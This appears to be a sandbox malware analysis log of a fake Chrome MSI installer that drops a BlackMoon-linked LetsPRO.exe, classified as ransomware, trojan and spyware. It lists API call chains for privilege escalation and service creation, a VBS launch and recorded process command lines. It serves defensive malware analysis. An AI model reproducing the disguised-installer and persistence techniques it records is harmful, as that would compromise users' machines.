                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94DAA85_2_6C94DAA8
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C983A685_2_6C983A68
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C991BE05_2_6C991BE0
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C903B5D5_2_6C903B5D
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C96D51B5_2_6C96D51B
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94D56F5_2_6C94D56F
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C9076015_2_6C907601
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C90362A5_2_6C90362A
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C9997A75_2_6C9997A7
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C9057D55_2_6C9057D5
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C9097095_2_6C909709
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C91913E5_2_6C91913E
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C96329A5_2_6C96329A
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C9072505_2_6C907250
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C96524D5_2_6C96524D
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C9993955_2_6C999395
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_002678978_2_00267897
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_002639298_2_00263929
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_0025A95F8_2_0025A95F
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_0025B18B8_2_0025B18B
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_00257B918_2_00257B91
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_0025AC098_2_0025AC09
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_0025A5408_2_0025A540
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_00262D558_2_00262D55
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_0025A5ED8_2_0025A5ED
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_0025AED08_2_0025AED0
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_0002783416_2_00027834
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_0001B14416_2_0001B144
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_0002016616_2_00020166
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_0002721816_2_00027218
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_00027AFB16_2_00027AFB
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_00022C7816_2_00022C78
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_0001448216_2_00014482
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_000264EE16_2_000264EE
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_0002758A16_2_0002758A
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_00027DB616_2_00027DB6
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_000227F016_2_000227F0
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_00128CF030_2_00128CF0
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_00133E2B30_2_00133E2B
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_00128A4630_2_00128A46
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_0012927230_2_00129272
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_001286D430_2_001286D4
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_00128FB730_2_00128FB7
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCEACD230_2_6CCEACD2
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CD12D5E30_2_6CD12D5E
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDF6E3830_2_6CDF6E38
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCFE5E630_2_6CCFE5E6
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDF256E30_2_6CDF256E
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDAFDB330_2_6CDAFDB3
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CD07EEA30_2_6CD07EEA
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCFFBB230_2_6CCFFBB2
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CD132F530_2_6CD132F5
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCF72B830_2_6CCF72B8
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCDF27030_2_6CCDF270
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDDB34030_2_6CDDB340
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCE731930_2_6CCE7319
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDB0C3630_2_6CDB0C36
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDE0D9B30_2_6CDE0D9B
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCF853A30_2_6CCF853A
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDC03ED30_2_6CDC03ED
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDB1CD330_2_6CDB1CD3
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDD994A30_2_6CDD994A
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CD0D96530_2_6CD0D965
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDE9A8030_2_6CDE9A80
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CD0DB6530_2_6CD0DB65
                  Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dll CD28DAEDA3C8731030E2077E6ECCBB609E2098919B05FF310BEF8DCE1DCE2D8D
                  Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dll 25D1CC5BE93C7A0B58855AD1F4C9DF3CFB9EC87E5DC13DB85B147B1951AC6FA8
                  Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe 8FE2226E8BEC5A45D4B819359192AB92446B54859BF8877573AB7A3C8B4ADA76
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: String function: 6CDDCA63 appears 43 times
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: String function: 6CD36E90 appears 37 times
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: String function: 6CC96E44 appears 174 times
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: String function: 6CC94253 appears 195 times
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: String function: 6CC970FF appears 39 times
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: String function: 00127A10 appears 33 times
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: String function: 6CDD6348 appears 315 times
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: String function: 6CC9F306 appears 60 times
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: String function: 6CDD6C30 appears 42 times
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: String function: 6CCA6E8C appears 77 times
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: String function: 6CC9F2DC appears 54 times
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: String function: 00015960 appears 33 times
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: String function: 6C900980 appears 151 times
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: String function: 6C90B6EA appears 61 times
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: String function: 6C90A495 appears 38 times
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: String function: 6C900964 appears 73 times
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: String function: 00258C30 appears 40 times
                  Source: goopdateres_ca.dll.16.drStatic PE information: Resource name: RT_STRING type: MIPSEB-LE MIPS-II ECOFF executable not stripped - version 0.114
                  Source: goopdateres_fil.dll.16.drStatic PE information: Resource name: RT_STRING type: VAX COFF executable, sections 80, created Wed Mar 25 10:31:05 1970, not stripped, version 108
                  Source: goopdateres_hu.dll.16.drStatic PE information: Resource name: RT_STRING type: MIPSEL MIPS-II ECOFF executable not stripped - version 0.101
                  Source: goopdateres_ms.dll.16.drStatic PE information: Resource name: RT_STRING type: 370 sysV executable not stripped
                  Source: goopdateres_tr.dll.16.drStatic PE information: Resource name: RT_STRING type: 370 XA sysV pure executable not stripped
                  Source: goopdateres_vi.dll.16.drStatic PE information: Resource name: RT_STRING type: iAPX 286 executable small model (COFF) not stripped
                  Source: goopdateres_ca.dll.30.drStatic PE information: Resource name: RT_STRING type: MIPSEB-LE MIPS-II ECOFF executable not stripped - version 0.114
                  Source: goopdateres_fil.dll.30.drStatic PE information: Resource name: RT_STRING type: VAX COFF executable, sections 80, created Wed Mar 25 10:31:05 1970, not stripped, version 108
                  Source: goopdateres_hu.dll.30.drStatic PE information: Resource name: RT_STRING type: MIPSEL MIPS-II ECOFF executable not stripped - version 0.101
                  Source: goopdateres_ms.dll.30.drStatic PE information: Resource name: RT_STRING type: 370 sysV executable not stripped
                  Source: goopdateres_tr.dll.30.drStatic PE information: Resource name: RT_STRING type: 370 XA sysV pure executable not stripped
                  Source: goopdateres_vi.dll.30.drStatic PE information: Resource name: RT_STRING type: iAPX 286 executable small model (COFF) not stripped
                  Source: sutup-Chrome.13.26.x64.msiBinary or memory string: OriginalFilenameaischeduler.dllF vs sutup-Chrome.13.26.x64.msi
                  Source: sutup-Chrome.13.26.x64.msiBinary or memory string: OriginalFilenameShortcutFlags.dllF vs sutup-Chrome.13.26.x64.msi
                  Source: 5.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 14.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 5.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 19.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 13.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 31.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 14.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 26.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 26.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 15.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 19.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 17.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 28.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 17.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 15.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 31.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 18.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 27.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 4.2.LetsPRO.exe.1003c7a7.16.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 27.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 28.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 29.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 13.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 4.2.LetsPRO.exe.10020253.17.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 29.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 18.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winMSI@78/175@1/2
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_00013040 GetLastError,SetLastError,FormatMessageW,GetLastError,SetLastError,LocalFree,16_2_00013040
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F37B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,4_2_03F37B70
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F37740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,4_2_03F37740
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCA0A17 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,FindCloseChangeNotification,30_2_6CCA0A17
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F36C50 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf,4_2_03F36C50
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,30_2_6CCAA847
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,30_2_6CCAA4FF
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F36050 _memset,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle,4_2_03F36050
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F36150 wsprintfW,_memset,lstrcatW,lstrcatW,lstrcatW,CoCreateInstance,wsprintfW,RegOpenKeyExW,_memset,wsprintfW,RegOpenKeyExW,_memset,RegQueryValueExW,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,lstrlenW,lstrcatW,4_2_03F36150
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_00012005 FindResourceW,LoadResource,LockResource,CreateFileW,SizeofResource,SetFilePointerEx,CloseHandle,16_2_00012005
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCAA42F OpenSCManagerW,GetLastError,OpenServiceW,ChangeServiceConfigW,GetLastError,CloseServiceHandle,CloseServiceHandle,30_2_6CCAA42F
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCAA005 StartServiceCtrlDispatcherW,GetLastError,WaitForSingleObject,CloseHandle,30_2_6CCAA005
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCA9F60 StartServiceCtrlDispatcherW,GetLastError,WaitForSingleObject,CloseHandle,30_2_6CCA9F60
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CMLB5E7.tmpJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7824:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeMutant created: \Sessions\1\BaseNamedObjects\Global\G{D19BAF17-7C87-467E-8D63-6C4B1C836373}
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeMutant created: \Sessions\1\BaseNamedObjects\Global\GS-1-5-21-2246122658-3693405117-2476756634-1003{D19BAF17-7C87-467E-8D63-6C4B1C836373}
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMutant created: \Sessions\1\BaseNamedObjects\2024. 4.21
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeMutant created: \Sessions\1\BaseNamedObjects\2024. 4.23
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeMutant created: \Sessions\1\BaseNamedObjects\Global\G{A9A86B93-B54E-4570-BE89-42418507707B}
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF983CA76AAB82BF40.TMPJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\cscript.exe cscript C:\Users\user\99944\144977.vbs
                  Source: C:\Program Files (x86)\ChromeSetup.exeCommand line argument: kernel32.dll16_2_0001260C
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCommand line argument: kernel32.dll30_2_00126898
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCommand line argument: DllEntry30_2_00126898
                  Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                  Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: GoogleUpdate.exeString found in binary or memory: Application update/install
                  Source: GoogleUpdate.exeString found in binary or memory: https://www.google.com/support/installer/?
                  Source: GoogleUpdate.exeString found in binary or memory: /installerdata=
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\sutup-Chrome.13.26.x64.msi"
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F88407A7EB4CD1FAACECE5C8A82A6774
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: unknownProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ChromeSetup.exe "C:\Program Files (x86)\ChromeSetup.exe"
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
